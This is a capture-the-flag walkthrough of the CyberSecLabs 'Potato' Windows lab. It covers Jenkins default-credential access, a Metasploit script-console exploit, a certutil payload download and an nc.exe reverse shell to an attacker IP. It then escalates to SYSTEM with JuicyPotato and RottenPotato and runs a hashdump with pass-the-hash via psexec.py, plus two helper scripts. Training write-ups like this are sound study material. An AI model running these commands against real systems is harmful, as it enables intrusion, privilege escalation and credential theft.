csl-potato-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.
Today let’s play Potato at https://www.cyberseclabs.co.uk/labs/beginner-labs

Tasks

Step 1: Enumeration (nmap)

sudo nmap -O -A -p- 172.31.1.19    (full port range with OS and version detection; the quick default scan below is the output shown here)

kali@kali:~/cyberseclabs$ nmap 172.31.1.19
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-25 10:33 EDT
Nmap scan report for 172.31.1.19
Host is up (0.10s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
8080/tcp open http-proxy
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49163/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds

curl http://172.31.1.19:8080

We get a Jenkins login page. Let’s try some default credentials, the good old admin:admin, and it lets us in.

 

Step 2: Exploitation

Browsing around the console and clicking about, I had no idea what I was looking for. Then I saw the Script Console, which stirs up evil thoughts about how to exploit this thing: it runs arbitrary Groovy (Java) code on the Jenkins master as whatever account Jenkins runs as. Some googling turned up a Metasploit module that abuses exactly that. The same thing can be done manually, without Metasploit’s spoon-feeding, by typing commands straight into the console.

Exploit: https://www.rapid7.com/db/modules/exploit/multi/http/jenkins_script_console

Let’s now fire up Metasploit from our terminal and use the exploit module following the commands in order:

msfconsole
use exploit/multi/http/jenkins_script_console
set RHOSTS 172.31.1.19
set RPORT 8080
set TARGETURI /script/
set USERNAME admin
set PASSWORD admin

Note that TARGETURI is the module’s “path to Jenkins” option; the module appends script and the login endpoint to it itself, so for a Jenkins served at the server root the usual value is /. The /script/ value above is what was used here. By default this module uses a reverse_https payload for the connection back; I switched to reverse_tcp for consistency.

set payload windows/meterpreter/reverse_tcp
set LHOST <your ip>
set LPORT 7777
run

The exploit runs and hands us a meterpreter session. I typed shell to drop into a Windows command prompt and read the first flag:

C:\Users\ben\Desktop>type access.txt
type access.txt
11d92ba4a09c10adf0eb3636ad4c57e5
C:\Users\ben\Desktop>

Step 3: Post Exploitation

I ran whoami /priv to see whether this box was a candidate for the Juicy Potato exploit:

C:\Users\ben\Desktop>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                                 State
=============================   =========================================   ========
SeChangeNotifyPrivilege         Bypass traverse checking                    Enabled
SeImpersonatePrivilege          Impersonate a client after authentication   Enabled
SeCreateGlobalPrivilege         Create global objects                       Enabled
SeIncreaseWorkingSetPrivilege   Increase a process working set              Disabled

C:\Users\ben\Desktop>

SeImpersonatePrivilege is present and enabled. That is the prerequisite for the Potato family of attacks (Rotten Potato, Juicy Potato): a process holding it (or SeAssignPrimaryTokenPrivilege) can impersonate the SYSTEM token that the attack coaxes out of a local COM server and spawn a process with it.

I found a Juicy Potato exploit module for Metasploit. While still in the command shell, press Ctrl-Z to background the session; answer y if it asks whether to background it.

Back at the main Metasploit prompt, the sessions command lists what we have running in the background. Then load the Juicy Potato module:

use exploit/windows/local/ms16_075_reflection_juicy
set SESSION 1
set LHOST <your ip>
run

Sadly, that did not work for me.

So instead we transfer the JuicyPotato binary (from the JuicyPotato GitHub repo) and nc.exe (Netcat for Windows) to the victim ourselves, using certutil:

c:\users\ben>certutil -urlcache -split -f http://10.10.1.1/nc.exe nc.exe

JuicyPotato also needs a CLSID argument: the COM server it abuses, which differs per Windows version. The per-OS lists are in the JuicyPotato GitHub repo. The systeminfo command shows the machine is running Windows Server 2012 (the version banner seen later, 6.3.9600, is 2012 R2).

Next, we create a batch file, having the following contents.

echo nc.exe -e cmd.exe 10.10.0.38 1337 > rev.bat

When rev.bat runs, nc.exe connects back to our machine with cmd.exe attached to the connection. Use the full path to nc.exe inside the batch file: the process JuicyPotato launches as SYSTEM inherits whatever working directory juicy.exe had, so a bare nc.exe is only found if it sits in that directory or in the PATH.

Before running JuicyPotato, start a netcat listener on our machine for the port in rev.bat: nc -lvnp 1337.

Running JuicyPotato now:


c:\puck\juicy.exe -p c:\Users\ben\rev.bat -t * -l 6666 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}

Here,

  • -t : which CreateProcess call to use (t = CreateProcessWithTokenW, u = CreateProcessAsUser, * = try both)
  • -p : Program to launch (as SYSTEM)
  • -l : COM server listen port
  • -c : CLSID of the COM server to abuse

Once this completes, we should get a shell back on our listener as NT AUTHORITY\SYSTEM.

Again, not for me:

c:\puck>juicy.exe -p c:\puck\rev.bat -t * -l 6666 -c {e60687f701a140aa-86ac-db1cbf673334}
juicy.exe -p c:\puck\rev.bat -t * -l 6666 -c {e60687f701a140aa-86ac-db1cbf673334}
Testing {e60687f701a140aa-86ac-db1cbf673334} 6666
COM -> recv failed with error: 10038
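A small preflight helper for this step, as an added example (not code from the original post or from the JuicyPotato project): it parses the whoami /priv output above to confirm a Potato-capable privilege is in the token, and validates and repairs the CLSID argument before the command line is built. The sample privilege text is copied from this post; the two CLSID spellings are the ones that appear in it, and the path check is my own rule, not a JuicyPotato requirement.

```python
"""Potato preflight: parse whoami /priv and validate JuicyPotato arguments.

Added example, not code from the original post or from the JuicyPotato
project. SAMPLE_WHOAMI_PRIV is the whoami /priv output from the post; the
CLSID strings are the two spellings that appear in it.
"""
import re
from typing import Dict, List

# Either of these in the token is what the Potato family needs. A Disabled
# state is fine: a process can enable any privilege its token already holds.
POTATO_PRIVS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

# Well-formed CLSID string: {8-4-4-4-12} hex groups with ASCII hyphens.
CLSID_RE = re.compile(
    r"^\{[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}\}$")

SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""


def parse_privs(text: str) -> Dict[str, str]:
    """Map privilege name -> 'Enabled'/'Disabled' from whoami /priv output.
    Data rows start with the Se... name and end with the state; the
    description between them can be any number of words."""
    privs: Dict[str, str] = {}
    for line in text.splitlines():
        parts = line.split()
        if (len(parts) >= 3 and parts[0].startswith("Se")
                and parts[-1] in ("Enabled", "Disabled")):
            privs[parts[0]] = parts[-1]
    return privs


def potato_candidates(privs: Dict[str, str]) -> List[str]:
    """Privileges present in the token that make a Potato attack viable."""
    return [p for p in POTATO_PRIVS if p in privs]


def normalize_clsid(s: str) -> str:
    """Repair the usual copy-paste damage: en/em dashes instead of
    hyphens, stray whitespace, missing braces."""
    s = s.strip().replace("\u2013", "-").replace("\u2014", "-")
    if not s.startswith("{"):
        s = "{" + s
    if not s.endswith("}"):
        s = s + "}"
    return s


def valid_clsid(s: str) -> bool:
    """True if s is a well-formed {8-4-4-4-12} CLSID string."""
    return CLSID_RE.match(s) is not None


def juicy_argv(juicy_exe: str, program: str, clsid: str, port: int = 6666,
               mode: str = "*") -> List[str]:
    """Build the JuicyPotato command line, refusing obviously bad input.
    -t is the CreateProcess call (t, u, or * for both), -l the COM server
    listen port, -c the CLSID, -p the program launched as SYSTEM."""
    clsid = normalize_clsid(clsid)
    if not valid_clsid(clsid):
        raise ValueError("malformed CLSID: " + clsid)
    if mode not in ("t", "u", "*"):
        raise ValueError("-t must be t, u or *")
    if not re.match(r"^[A-Za-z]:\\", program):
        # My own rule: a relative path depends on the working directory the
        # SYSTEM process inherits, which is an easy way to lose the shell.
        raise ValueError("use an absolute path for the program: " + program)
    return [juicy_exe, "-t", mode, "-p", program, "-l", str(port), "-c", clsid]


if __name__ == "__main__":
    privs = parse_privs(SAMPLE_WHOAMI_PRIV)
    print("potato privileges:", potato_candidates(privs))
    for c in ("{e60687f701a140aa-86ac-db1cbf673334}",
              "{e60687f7\u201301a1\u201340aa-86ac-db1cbf673334}"):
        print(c, "->", normalize_clsid(c), valid_clsid(normalize_clsid(c)))
    print(" ".join(juicy_argv(r"c:\puck\juicy.exe", r"c:\puck\rev.bat",
                              "{e60687f7-01a1-40aa-86ac-db1cbf673334}")))
```

Run against the two CLSID spellings in this post, the hyphen-less one is rejected and the en-dash one is repaired to {e60687f7-01a1-40aa-86ac-db1cbf673334}; a malformed CLSID is the first thing to rule out when the COM test fails.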

One thing to check in the run above before blaming the tool: the CLSID as typed, {e60687f701a140aa-86ac-db1cbf673334}, has lost the hyphens after the first two groups (the text it was pasted from used en-dashes), so it is not a well-formed {8-4-4-4-12} CLSID string; the correct form is {e60687f7-01a1-40aa-86ac-db1cbf673334}. Error 10038 is WSAENOTSOCK (a socket operation on something that is not a socket), so retrying with a correctly spelled CLSID, or another one from the repo’s Server 2012 list, would be the first thing to try. Rather than chase it, let’s go Rotten instead. RottenPotato leaves a SYSTEM token in our process, and Meterpreter’s incognito extension can pick it up with impersonate_token:

meterpreter > upload /tmp/rottenpotato.exe .
[*] uploading : /tmp/rottenpotato.exe -> .
[*] uploaded : /tmp/rottenpotato.exe -> .\rottenpotato.exe
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > execute -Hc -f rottenpotato.exe
Process 952 created.
Channel 3 created.
meterpreter > execute -Hc -f rottenpotato.exe
Process 1952 created.
Channel 4 created.
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

With a shell from the now-SYSTEM session we can read the Administrator’s flag:

c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 7863-44CF

 Directory of c:\Users\Administrator\Desktop


05/16/2020  01:26 PM    <DIR>          .
05/16/2020  01:26 PM    <DIR>          ..
05/19/2020  11:54 AM                32 system.txt
               1 File(s)             32 bytes
               2 Dir(s)   8,087,158,784 bytes free

c:\Users\Administrator\Desktop>
type system.txt
7b57e970b90d4244c5efa500b9dfe457
c:\Users\Administrator\Desktop>
c:\Users\Administrator\Desktop>^Z
Background channel 5? [y/N] y
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c79999f468c6922c065724d95a18223:::
ben:1009:aad3b435b51404eeaad3b435b51404ee:e549e5d2b2bf452ba959520eb82bdeeb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >

With the Administrator NT hash in hand we can pass the hash with Impacket’s psexec.py and get a SYSTEM shell over SMB whenever we want, no cracking needed:

kali@kali:~/cyberseclabs$ python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:1c79999f468c6922c065724d95a18223 administrator@172.31.1.19
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 172.31.1.19.....
[*] Found writable share ADMIN$
[*] Uploading file fJyPgVRp.exe
[*] Opening SVCManager on 172.31.1.19.....
[*] Creating service srVS on 172.31.1.19.....
[*] Starting service srVS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname &&whoami
Potato
nt authority\system

C:\Windows\system32>
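To make the hashdump-to-psexec step explicit, an added example (not code from the original post or from Impacket): it parses pwdump-format lines, flags the sentinel values a pentester should recognise (the empty LM hash, the blank-password NT hash, RID 500), and builds the psexec.py pass-the-hash command line. The sample lines are the hashdump output above and the host is the lab IP from this post.

```python
"""Read Meterpreter hashdump output and turn it into an Impacket
pass-the-hash command line.

Added example, not code from the original post or from Impacket.
SAMPLE_HASHDUMP is the hashdump output from the post; the target host is
the lab IP from the post.
"""
from typing import Dict, List

# Sentinel hashes worth recognising on sight.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "": blank password

SAMPLE_HASHDUMP = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c79999f468c6922c065724d95a18223:::
ben:1009:aad3b435b51404eeaad3b435b51404ee:e549e5d2b2bf452ba959520eb82bdeeb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def parse_pwdump(text: str) -> List[Dict[str, str]]:
    """Parse user:rid:lm:nt::: lines; anything that does not fit is skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue
        entries.append({"user": parts[0], "rid": parts[1], "lm": lm, "nt": nt})
    return entries


def describe(entry: Dict[str, str]) -> str:
    """Triage one entry: what the hash values and RID tell us."""
    notes = []
    if entry["rid"] == "500":
        # The built-in Administrator is exempt from the UAC remote
        # restrictions that block other local admins over SMB, so
        # pass-the-hash against it works out of the box.
        notes.append("built-in Administrator (RID 500): pass-the-hash over SMB works")
    if entry["nt"] == EMPTY_NT:
        notes.append("blank password")
    if entry["lm"] == EMPTY_LM:
        notes.append("no LM hash stored")
    return "; ".join(notes) if notes else "ordinary account"


def psexec_argv(entry: Dict[str, str], host: str) -> List[str]:
    """Impacket psexec.py invocation. -hashes takes LM:NT; NTLMv2 only uses
    the NT half, so the empty LM value is passed through unchanged."""
    return ["psexec.py", "-hashes", f"{entry['lm']}:{entry['nt']}",
            f"{entry['user']}@{host}"]


if __name__ == "__main__":
    for e in parse_pwdump(SAMPLE_HASHDUMP):
        print(f"{e['user']:<14} rid={e['rid']:<5} {describe(e)}")
    admin = parse_pwdump(SAMPLE_HASHDUMP)[0]
    print(" ".join(psexec_argv(admin, "172.31.1.19")))
```

On this dump the helper reports that Guest has a blank password and that no account has an LM hash, and it emits the same psexec.py command line that was run above for Administrator.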

Author – Puckiestyle
